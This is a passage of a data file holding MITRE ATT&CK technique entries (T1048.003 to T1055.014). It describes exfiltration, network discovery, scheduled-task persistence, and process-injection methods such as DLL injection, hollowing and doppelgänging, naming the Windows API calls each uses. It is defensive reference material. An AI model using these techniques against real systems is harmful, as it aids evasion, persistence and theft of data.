 'T1048.003': {'attack_id': 'T1048.003',
               'categories': ['exfiltration'],
               'description': 'Adversaries may steal data by exfiltrating it over an un-encrypted network protocol '
                              'other than that of the existing command and control channel. The data may also be sent '
                              'to an alternate network location from the main command and control server.(Citation: '
                              'copy_cmd_cisco)\n'
                              '\n'
                              'Adversaries may opt to obfuscate this data, without the use of encryption, within '
                              'network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may '
                              'include custom or publicly available encoding/compression algorithms (such as base64) '
                              'as well as embedding data within protocol headers and fields. ',
               'name': 'Exfiltration Over Unencrypted Non-C2 Protocol',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1049': {'attack_id': 'T1049',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of network connections to or from the compromised '
                          'system they are currently accessing or from remote systems by querying for information over '
                          'the network. \n'
                          '\n'
                          'An adversary who gains access to a system that is part of a cloud-based environment may map '
                          'out Virtual Private Clouds or Virtual Networks in order to determine what systems and '
                          'services are connected. The actions performed are likely the same types of discovery '
                          'techniques depending on the operating system, but the resulting information may include '
                          "details about the networked cloud environment relevant to the adversary's goals. Cloud "
                          'providers may have different ways in which their virtual networks operate.(Citation: Amazon '
                          'AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC '
                          'Overview) Similarly, adversaries who gain access to network devices may also perform '
                          'similar discovery activities to gather information about connected systems and services.\n'
                          '\n'
                          'Utilities and commands that acquire this information include '
                          '[netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with '
                          '[Net](https://attack.mitre.org/software/S0039). In Mac and Linux, '
                          '[netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to '
                          'list current connections. <code>who -a</code> and <code>w</code> can be used to show which '
                          'users are currently logged in, similar to "net session". Additionally, built-in features '
                          'native to network devices and [Network Device '
                          'CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip '
                          'sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A)',
           'name': 'System Network Connections Discovery',
           'platforms': ['Windows', 'IaaS', 'Linux', 'macOS', 'Network']},
 'T1051': {'attack_id': 'T1051',
           'categories': ['lateral-movement'],
           'description': '**This technique has been deprecated and should no longer be used.**\n'
                          '\n'
                          'Adversaries may add malicious content to an internally accessible website through an open '
                          "network file share that contains the website's webroot or Web content directory (Citation: "
                          'Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content '
                          'with a Web browser to cause the server to execute the malicious content. The malicious '
                          'content will typically run under the context and permissions of the Web server process, '
                          'often resulting in local system or administrative privileges, depending on how the Web '
                          'server is configured.\n'
                          '\n'
                          'This mechanism of shared access and remote execution could be used for lateral movement to '
                          'the system running the Web server. For example, a Web server running PHP with an open '
                          'network share could allow an adversary to upload a remote access tool and PHP script to '
                          'execute the RAT on the system running the Web server when a specific page is visited. '
                          '(Citation: Webroot PHP 2011)',
           'name': 'Shared Webroot',
           'platforms': ['Windows']},
 'T1052': {'attack_id': 'T1052',
           'categories': ['exfiltration'],
           'description': 'Adversaries may attempt to exfiltrate data via a physical medium, such as a removable '
                          'drive. In certain circumstances, such as an air-gapped network compromise, exfiltration '
                          'could occur via a physical medium or device introduced by a user. Such media could be an '
                          'external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and '
                          'processing device. The physical medium or device could be used as the final exfiltration '
                          'point or to hop between otherwise disconnected systems.',
           'name': 'Exfiltration Over Physical Medium',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1052.001': {'attack_id': 'T1052.001',
               'categories': ['exfiltration'],
               'description': 'Adversaries may attempt to exfiltrate data over a USB connected physical device. In '
                              'certain circumstances, such as an air-gapped network compromise, exfiltration could '
                              'occur via a USB device introduced by a user. The USB device could be used as the final '
                              'exfiltration point or to hop between otherwise disconnected systems.',
               'name': 'Exfiltration over USB',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1053': {'attack_id': 'T1053',
           'categories': ['execution', 'persistence', 'privilege-escalation'],
           'description': 'Adversaries may abuse task scheduling functionality to facilitate initial or recurring '
                          'execution of malicious code. Utilities exist within all major operating systems to schedule '
                          'programs or scripts to be executed at a specified date and time. A task can also be '
                          'scheduled on a remote system, provided the proper authentication is met (ex: RPC and file '
                          'and printer sharing in Windows environments). Scheduling a task on a remote system '
                          'typically may require being a member of an admin or otherwise privileged group on the '
                          'remote system.(Citation: TechNet Task Scheduler Security)\n'
                          '\n'
                          'Adversaries may use task scheduling to execute programs at system startup or on a scheduled '
                          'basis for persistence. These mechanisms can also be abused to run a process under the '
                          'context of a specified account (such as one with elevated permissions/privileges). Similar '
                          'to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries '
                          'have also abused task scheduling to potentially mask one-time execution under a trusted '
                          'system process.(Citation: ProofPoint Serpent)',
           'name': 'Scheduled Task/Job',
           'platforms': ['Windows', 'Linux', 'macOS', 'Containers']},
 'T1053.002': {'attack_id': 'T1053.002',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to '
                              'perform task scheduling for initial or recurring execution of malicious code. The '
                              '[at](https://attack.mitre.org/software/S0110) utility exists as an executable within '
                              'Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although '
                              'deprecated in favor of [Scheduled '
                              "Task](https://attack.mitre.org/techniques/T1053/005)'s "
                              '[schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using '
                              '[at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service '
                              'be running, and the user to be logged on as a member of the local Administrators '
                              'group.\n'
                              '\n'
                              'On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the '
                              'superuser as well as any users added to the <code>at.allow</code> file. If the '
                              '<code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. '
                              'Every username not listed in <code>at.deny</code> is allowed to invoke '
                              '[at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and '
                              'is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If '
                              'neither file exists (which is often the baseline) only the superuser is allowed to use '
                              '[at](https://attack.mitre.org/software/S0110).(Citation: Linux at)\n'
                              '\n'
                              'Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs '
                              'at system startup or on a scheduled basis for '
                              '[Persistence](https://attack.mitre.org/tactics/TA0003). '
                              '[at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote '
                              '[Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral '
                              'Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the '
                              'context of a specified account (such as SYSTEM).\n'
                              '\n'
                              'In Linux environments, adversaries may also abuse '
                              '[at](https://attack.mitre.org/software/S0110) to break out of restricted environments '
                              'by using a task to spawn an interactive system shell or to run system commands. '
                              'Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for '
                              '[Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is '
                              'allowed to run as superuser via <code>sudo</code>.(Citation: GTFObins at)',
               'name': 'At',
               'platforms': ['Windows', 'Linux', 'macOS']},
 'T1053.003': {'attack_id': 'T1053.003',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse the <code>cron</code> utility to perform task scheduling for '
                              'initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and '
                              'Techniques) The <code>cron</code> utility is a time-based job scheduler for Unix-like '
                              'operating systems.  The <code> crontab</code> file contains the schedule of cron '
                              'entries to be run and the specified times for execution. Any <code>crontab</code> files '
                              'are stored in operating system-specific file paths.\n'
                              '\n'
                              'An adversary may use <code>cron</code> in Linux or Unix environments to execute '
                              'programs at system startup or on a scheduled basis for '
                              '[Persistence](https://attack.mitre.org/tactics/TA0003). ',
               'name': 'Cron',
               'platforms': ['Linux', 'macOS']},
 'T1053.004': {'attack_id': 'T1053.004',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'This technique is deprecated due to the inaccurate usage. The report cited did not '
                              'provide technical detail as to how the malware interacted directly with launchd rather '
                              'than going through known services. Other system services are used to interact with '
                              'launchd rather than launchd being used by itself. \n'
                              '\n'
                              'Adversaries may abuse the <code>Launchd</code> daemon to perform task scheduling for '
                              'initial or recurring execution of malicious code. The <code>launchd</code> daemon, '
                              'native to macOS, is responsible for loading and maintaining services within the '
                              'operating system. This process loads the parameters for each launch-on-demand '
                              'system-level daemon from the property list (plist) files found in '
                              '<code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> '
                              '(Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list '
                              'files which point to the executables that will be launched (Citation: Methods of Mac '
                              'Malware Persistence).\n'
                              '\n'
                              'An adversary may use the <code>launchd</code> daemon in macOS environments to schedule '
                              'new executables to run at system startup or on a scheduled basis for persistence. '
                              '<code>launchd</code> can also be abused to run a process under the context of a '
                              'specified account. Daemons, such as <code>launchd</code>, run with the permissions of '
                              'the root user account, and will operate regardless of which user account is logged in.',
               'name': 'Launchd',
               'platforms': ['macOS']},
 'T1053.005': {'attack_id': 'T1053.005',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial '
                              'or recurring execution of malicious code. There are multiple ways to access the Task '
                              'Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility '
                              'can be run directly on the command line, or the Task Scheduler can be opened through '
                              'the GUI within the Administrator Tools section of the Control Panel. In some cases, '
                              'adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, '
                              'adversaries have used the Windows netapi32 library to create a scheduled task.\n'
                              '\n'
                              'The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be '
                              'abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though '
                              '<code>at.exe</code> can not access tasks created with <code>schtasks</code> or the '
                              'Control Panel.\n'
                              '\n'
                              'An adversary may use Windows Task Scheduler to execute programs at system startup or on '
                              'a scheduled basis for persistence. The Windows Task Scheduler can also be abused to '
                              'conduct remote Execution as part of Lateral Movement and/or to run a process under the '
                              'context of a specified account (such as SYSTEM). Similar to [System Binary Proxy '
                              'Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the '
                              'Windows Task Scheduler to potentially mask one-time execution under signed/trusted '
                              'system processes.(Citation: ProofPoint Serpent)\n'
                              '\n'
                              'Adversaries may also create "hidden" scheduled tasks (i.e. [Hide '
                              'Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to '
                              'defender tools and manual queries used to enumerate tasks. Specifically, an adversary '
                              'may hide a task from `schtasks /query` and the Task Scheduler by deleting the '
                              'associated Security Descriptor (SD) registry value (where deletion of this value must '
                              'be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled '
                              'task) Adversaries may also employ alternate methods to hide tasks, such as altering the '
                              'metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending '
                              'Against Scheduled Task Attacks in Windows Environments) ',
               'name': 'Scheduled Task',
               'platforms': ['Windows']},
 'T1053.006': {'attack_id': 'T1053.006',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse systemd timers to perform task scheduling for initial or '
                              'recurring execution of malicious code. Systemd timers are unit files with file '
                              'extension <code>.timer</code> that control services. Timers can be set to run on a '
                              'calendar event or after a time span relative to a starting point. They can be used as '
                              'an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux '
                              'environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be '
                              'activated remotely via the <code>systemctl</code> command line utility, which operates '
                              'over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote '
                              'Control)\n'
                              '\n'
                              'Each <code>.timer</code> file must have a corresponding <code>.service</code> file with '
                              'the same name, e.g., <code>example.timer</code> and <code>example.service</code>. '
                              '<code>.service</code> files are [Systemd '
                              'Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by '
                              'the systemd system and service manager.(Citation: Linux man-pages: systemd January '
                              '2014) Privileged timers are written to <code>/etc/systemd/system/</code> and '
                              '<code>/usr/lib/systemd/system</code> while user level are written to '
                              '<code>~/.config/systemd/user/</code>.\n'
                              '\n'
                              'An adversary may use systemd timers to execute malicious code at system startup or on a '
                              'scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise '
                              'BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: '
                              'acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using '
                              'privileged paths may be used to maintain root level persistence. Adversaries may also '
                              'install user level timers to achieve user level persistence.(Citation: Falcon Sandbox '
                              'smp: 28553b3a9d)',
               'name': 'Systemd Timers',
               'platforms': ['Linux']},
 'T1053.007': {'attack_id': 'T1053.007',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse task scheduling functionality provided by container orchestration '
                              'tools such as Kubernetes to schedule deployment of containers configured to execute '
                              'malicious code. Container orchestration jobs run these automated tasks at a specific '
                              'date and time, similar to cron jobs on a Linux system. Deployments of this type can '
                              'also be configured to maintain a quantity of containers over time, automating the '
                              'process of maintaining persistence within a cluster.\n'
                              '\n'
                              'In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers '
                              'to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An '
                              'adversary therefore may utilize a CronJob to schedule deployment of a Job that executes '
                              'malicious code in various nodes within a cluster.(Citation: Threat Matrix for '
                              'Kubernetes)',
               'name': 'Container Orchestration Job',
               'platforms': ['Containers']},
 'T1055': {'attack_id': 'T1055',
           'categories': ['defense-evasion', 'privilege-escalation'],
           'description': 'Adversaries may inject code into processes in order to evade process-based defenses as well '
                          'as possibly elevate privileges. Process injection is a method of executing arbitrary code '
                          'in the address space of a separate live process. Running code in the context of another '
                          "process may allow access to the process's memory, system/network resources, and possibly "
                          'elevated privileges. Execution via process injection may also evade detection from security '
                          'products since the execution is masked under a legitimate process. \n'
                          '\n'
                          'There are many different ways to inject code into a process, many of which abuse legitimate '
                          'functionalities. These implementations exist for every major OS but are typically platform '
                          'specific. \n'
                          '\n'
                          'More sophisticated samples may perform multiple process injections to segment modules and '
                          'further evade detection, utilizing named pipes or other inter-process communication (IPC) '
                          'mechanisms as a communication channel. ',
           'name': 'Process Injection',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1055.001': {'attack_id': 'T1055.001',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade '
                              'process-based defenses as well as possibly elevate privileges. DLL injection is a '
                              'method of executing arbitrary code in the address space of a separate live process.  \n'
                              '\n'
                              'DLL injection is commonly performed by writing the path to a DLL in the virtual address '
                              'space of the target process before loading the DLL by invoking a new thread. The write '
                              'can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and '
                              '<code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> '
                              '(which calls the <code>LoadLibrary</code> API responsible for loading the DLL). '
                              '(Citation: Elastic Process Injection July 2017) \n'
                              '\n'
                              'Variations of this method such as reflective DLL injection (writing a self-mapping DLL '
                              'into a process) and memory module (map DLL when writing into process) overcome the '
                              'address relocation issue as well as the additional APIs to invoke execution (since '
                              'these methods load and execute the files in memory by manually preforming the function '
                              'of <code>LoadLibrary</code>).(Citation: Elastic HuntingNMemory June 2017)(Citation: '
                              'Elastic Process Injection July 2017) \n'
                              '\n'
                              'Another variation of this method, often referred to as Module Stomping/Overloading or '
                              'DLL Hollowing, may be leveraged to conceal injected code within a process. This method '
                              'involves loading a legitimate DLL into a remote process then manually overwriting the '
                              "module's <code>AddressOfEntryPoint</code> before starting a new thread in the target "
                              'process.(Citation: Module Stomping for Shellcode Injection) This variation allows '
                              'attackers to hide malicious injected code by potentially backing its execution with a '
                              'legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) \n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via DLL '
                              'injection may also evade detection from security products since the execution is masked '
                              'under a legitimate process. ',
               'name': 'Dynamic-link Library Injection',
               'platforms': ['Windows']},
 'T1055.002': {'attack_id': 'T1055.002',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject portable executables (PE) into processes in order to evade '
                              'process-based defenses as well as possibly elevate privileges. PE injection is a method '
                              'of executing arbitrary code in the address space of a separate live process. \n'
                              '\n'
                              'PE injection is commonly performed by copying code (perhaps without a file on disk) '
                              'into the virtual address space of the target process before invoking it via a new '
                              'thread. The write can be performed with native Windows API calls such as '
                              '<code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with '
                              '<code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of '
                              'the injected code does introduce the additional requirement for functionality to remap '
                              'memory references. (Citation: Elastic Process Injection July 2017) \n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via PE '
                              'injection may also evade detection from security products since the execution is masked '
                              'under a legitimate process. ',
               'name': 'Portable Executable Injection',
               'platforms': ['Windows']},
 'T1055.003': {'attack_id': 'T1055.003',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into hijacked processes in order to evade '
                              'process-based defenses as well as possibly elevate privileges. Thread Execution '
                              'Hijacking is a method of executing arbitrary code in the address space of a separate '
                              'live process. \n'
                              '\n'
                              'Thread Execution Hijacking is commonly performed by suspending an existing process then '
                              'unmapping/hollowing its memory, which can then be replaced with malicious code or the '
                              'path to a DLL. A handle to an existing victim process is first created with native '
                              'Windows API calls such as <code>OpenThread</code>. At this point the process can be '
                              'suspended then written to, realigned to the injected code, and resumed via '
                              '<code>SuspendThread </code>, <code>VirtualAllocEx</code>, '
                              '<code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then '
                              '<code>ResumeThread</code> respectively.(Citation: Elastic Process Injection July 2017)\n'
                              '\n'
                              'This is very similar to [Process '
                              'Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing '
                              'process rather than creating a process in a suspended state.  \n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via '
                              'Thread Execution Hijacking may also evade detection from security products since the '
                              'execution is masked under a legitimate process. ',
               'name': 'Thread Execution Hijacking',
               'platforms': ['Windows']},
 'T1055.004': {'attack_id': 'T1055.004',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into processes via the asynchronous procedure '
                              'call (APC) queue in order to evade process-based defenses as well as possibly elevate '
                              'privileges. APC injection is a method of executing arbitrary code in the address space '
                              'of a separate live process. \n'
                              '\n'
                              'APC injection is commonly performed by attaching malicious code to the APC Queue '
                              "(Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when "
                              'the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing '
                              'victim process is first created with native Windows API calls such as '
                              '<code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke '
                              'a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL). \n'
                              '\n'
                              'A variation of APC injection, dubbed "Early Bird injection", involves creating a '
                              'suspended process in which malicious code can be written and executed before the '
                              "process' entry point (and potentially subsequent anti-malware hooks) via an APC. "
                              '(Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct '
                              '2016) is another variation that utilizes APCs to invoke malicious code previously '
                              'written to the global atom table.(Citation: Microsoft Atom Table)\n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via APC '
                              'injection may also evade detection from security products since the execution is masked '
                              'under a legitimate process. ',
               'name': 'Asynchronous Procedure Call',
               'platforms': ['Windows']},
 'T1055.005': {'attack_id': 'T1055.005',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into processes via thread local storage (TLS) '
                              'callbacks in order to evade process-based defenses as well as possibly elevate '
                              'privileges. TLS callback injection is a method of executing arbitrary code in the '
                              'address space of a separate live process. \n'
                              '\n'
                              'TLS callback injection involves manipulating pointers inside a portable executable (PE) '
                              "to redirect a process to malicious code before reaching the code's legitimate entry "
                              'point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by '
                              'threads. Manipulating TLS callbacks may be performed by allocating and writing to '
                              'specific offsets within a process’ memory space using other [Process '
                              'Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process '
                              'Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov '
                              '2017)\n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via TLS '
                              'callback injection may also evade detection from security products since the execution '
                              'is masked under a legitimate process. ',
               'name': 'Thread Local Storage',
               'platforms': ['Windows']},
 'T1055.008': {'attack_id': 'T1055.008',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into processes via ptrace (process trace) system '
                              'calls in order to evade process-based defenses as well as possibly elevate privileges. '
                              'Ptrace system call injection is a method of executing arbitrary code in the address '
                              'space of a separate live process. \n'
                              '\n'
                              'Ptrace system call injection involves attaching to and modifying a running process. The '
                              'ptrace system call enables a debugging process to observe and control another process '
                              '(and each individual thread), including changing memory and register values.(Citation: '
                              'PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary '
                              'code into a running process (ex: <code>malloc</code>) then invoking that memory with '
                              '<code>PTRACE_SETREGS</code> to set the register containing the next instruction to '
                              'execute. Ptrace system call injection can also be done with '
                              '<code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a '
                              'specific address in the target processes’ memory (ex: the current address of the next '
                              'instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n'
                              '\n'
                              'Ptrace system call injection may not be possible targeting processes that are non-child '
                              'processes and/or have higher-privileges.(Citation: BH Linux Inject) \n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via '
                              'ptrace system call injection may also evade detection from security products since the '
                              'execution is masked under a legitimate process. ',
               'name': 'Ptrace System Calls',
               'platforms': ['Linux']},
 'T1055.009': {'attack_id': 'T1055.009',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into processes via the /proc filesystem in order '
                              'to evade process-based defenses as well as possibly elevate privileges. Proc memory '
                              'injection is a method of executing arbitrary code in the address space of a separate '
                              'live process. \n'
                              '\n'
                              'Proc memory injection involves enumerating the memory of a process via the /proc '
                              'filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) '
                              'payload with available gadgets/instructions. Each running process has its own '
                              'directory, which includes memory mappings. Proc memory injection is commonly performed '
                              'by overwriting the target processes’ stack using memory mappings provided by the /proc '
                              'filesystem. This information can be used to enumerate offsets (including the stack) and '
                              'gadgets (or instructions within the program that can be used to build a malicious '
                              'payload) otherwise hidden by process memory protections such as address space layout '
                              'randomization (ASLR). Once enumerated, the target processes’ memory map within '
                              '<code>/proc/[pid]/maps</code> can be overwritten using dd.(Citation: Uninformed '
                              'Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n'
                              '\n'
                              'Other techniques such as [Dynamic Linker '
                              'Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a '
                              'target process with more available gadgets. Similar to [Process '
                              'Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may '
                              'target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux '
                              'Injection) \n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via proc '
                              'memory injection may also evade detection from security products since the execution is '
                              'masked under a legitimate process. ',
               'name': 'Proc Memory',
               'platforms': ['Linux']},
 'T1055.011': {'attack_id': 'T1055.011',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into process via Extra Window Memory (EWM) in '
                              'order to evade process-based defenses as well as possibly elevate privileges. EWM '
                              'injection is a method of executing arbitrary code in the address space of a separate '
                              'live process. \n'
                              '\n'
                              'Before creating a window, graphical Windows-based processes must prescribe to or '
                              'register a windows class, which stipulate appearance and behavior (via windows '
                              'procedures, which are functions that handle input/output of data).(Citation: Microsoft '
                              'Window Classes) Registration of new windows classes can include a request for up to 40 '
                              'bytes of EWM to be appended to the allocated memory of each instance of that class. '
                              'This EWM is intended to store data specific to that window and has specific application '
                              'programming interface (API) functions to set and get its value. (Citation: Microsoft '
                              'GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n'
                              '\n'
                              'Although small, the EWM is large enough to store a 32-bit pointer and is often used to '
                              'point to a windows procedure. Malware may possibly utilize this memory location in part '
                              'of an attack chain that includes writing code to shared sections of the process’s '
                              'memory, placing a pointer to the code in EWM, then invoking execution by returning '
                              'execution control to the address in the process’s EWM.\n'
                              '\n'
                              "Execution granted through EWM injection may allow access to both the target process's "
                              'memory and possibly elevated privileges. Writing payloads to shared sections also '
                              'avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> '
                              'and <code>CreateRemoteThread</code>.(Citation: Elastic Process Injection July 2017) '
                              'More sophisticated malware samples may also potentially bypass protection mechanisms '
                              'such as data execution prevention (DEP) by triggering a combination of windows '
                              'procedures and other system functions that will rewrite the malicious payload inside an '
                              'executable portion of the target process.  (Citation: MalwareTech Power Loader Aug '
                              '2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via EWM '
                              'injection may also evade detection from security products since the execution is masked '
                              'under a legitimate process. ',
               'name': 'Extra Window Memory Injection',
               'platforms': ['Windows']},
 'T1055.012': {'attack_id': 'T1055.012',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into suspended and hollowed processes in order to '
                              'evade process-based defenses. Process hollowing is a method of executing arbitrary code '
                              'in the address space of a separate live process.  \n'
                              '\n'
                              'Process hollowing is commonly performed by creating a process in a suspended state then '
                              'unmapping/hollowing its memory, which can then be replaced with malicious code. A '
                              'victim process can be created with native Windows API calls such as '
                              '<code>CreateProcess</code>, which includes a flag to suspend the processes primary '
                              'thread. At this point the process can be unmapped using APIs calls such as '
                              '<code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code>  before being '
                              'written to, realigned to the injected code, and resumed via '
                              '<code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, '
                              '<code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: '
                              'Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n'
                              '\n'
                              'This is very similar to [Thread Local '
                              'Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process '
                              'rather than targeting an existing process. This behavior will likely not result in '
                              'elevated privileges since the injected process was spawned from (and thus inherits the '
                              'security context) of the injecting process. However, execution via process hollowing '
                              'may also evade detection from security products since the execution is masked under a '
                              'legitimate process. ',
               'name': 'Process Hollowing',
               'platforms': ['Windows']},
 'T1055.013': {'attack_id': 'T1055.013',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into process via process doppelgänging in order '
                              'to evade process-based defenses as well as possibly elevate privileges. Process '
                              'doppelgänging is a method of executing arbitrary code in the address space of a '
                              'separate live process. \n'
                              '\n'
                              'Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe '
                              'file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only '
                              'one transacted handle to write to a file at a given time. Until the write handle '
                              'transaction is terminated, all other handles are isolated from the writer and may only '
                              'read the committed version of the file that existed at the time the handle was opened. '
                              '(Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic '
                              'rollback if the system or application fails during a write transaction. (Citation: '
                              'Microsoft Where to use TxF)\n'
                              '\n'
                              'Although deprecated, the TxF application programming interface (API) is still enabled '
                              'as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n'
                              '\n'
                              'Adversaries may abuse TxF to a perform a file-less variation of [Process '
                              'Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process '
                              'Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging '
                              'involves replacing the memory of a legitimate process, enabling the veiled execution of '
                              "malicious code that may evade defenses and detection. Process doppelgänging's use of "
                              'TxF also avoids the use of highly-monitored API functions such as '
                              '<code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and '
                              '<code>SetThreadContext</code>. (Citation: BlackHat Process Doppelgänging Dec 2017)\n'
                              '\n'
                              'Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process '
                              'Doppelgänging Dec 2017):\n'
                              '\n'
                              '* Transact – Create a TxF transaction using a legitimate executable then overwrite the '
                              'file with malicious code. These changes will be isolated and only visible within the '
                              'context of the transaction.\n'
                              '* Load – Create a shared section of memory and load the malicious executable.\n'
                              '* Rollback – Undo changes to original executable, effectively removing malicious code '
                              'from the file system.\n'
                              '* Animate – Create a process from the tainted section of memory and initiate '
                              'execution.\n'
                              '\n'
                              'This behavior will likely not result in elevated privileges since the injected process '
                              'was spawned from (and thus inherits the security context) of the injecting process. '
                              'However, execution via process doppelgänging may evade detection from security products '
                              'since the execution is masked under a legitimate process. ',
               'name': 'Process Doppelgänging',
               'platforms': ['Windows']},
 'T1055.014': {'attack_id': 'T1055.014',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into processes via VDSO hijacking in order to '
                              'evade process-based defenses as well as possibly elevate privileges. Virtual dynamic '
